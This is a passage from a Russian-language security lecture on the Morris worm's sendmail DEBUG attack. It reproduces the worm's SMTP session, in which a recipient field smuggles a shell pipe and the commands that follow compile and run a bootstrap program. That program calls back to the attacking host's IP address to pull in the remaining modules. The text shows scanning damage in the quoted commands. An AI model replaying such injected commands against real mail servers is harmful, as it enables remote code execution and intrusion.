Лекция: Налицо типичный пример атаки по сценарию 1.

Спецификация программы, которая будет выполняться при получении почты, содержится в файле

Псевдонимов (aliases) программы sendmail или в пользовательском файле .forward. Такая спецификация

Используется программами, обрабатывающими или сортирующими почту, и не должна применяться самой

Программой sendmail. В вирусе эта программа-получатель содержала команды, убирающие заголовки почты,

После чего посылала остаток сообщения командному интерпретатору, который создавал, компилировал и

выполнял программу на языке С, служившую <абордажным крюком>, и та, в свою очередь, принимала

оставшиеся модули из атакующей машины. Вот, что передавал вирус через SMTP-соединение:

Debug

mail from: </dev/null>

rcptto:<«lsed-e'1,/»$/d' l/bin/sh;exit0">

Data

cd /usr/tmp

cat >x14481910.с <'EOF'

<текст программы 11.c>

EOF

Cc -о х14481910 х14481910.с; х14481910 128.32.134.16 32341 8712440; rm -f x14481910 x14481910.c

Quit

Вирус заражал компьютеры двух типов — VAX и Sun, поэтому пересылались двоичные коды для каждой

Архитектуры, оба запускались, но исполняться мог только один. В компьютерах других архитектур

Программы не могли функционировать, хотя и поглощали системные ресурсы в момент компиляции.

Ошибка в демоне fingerd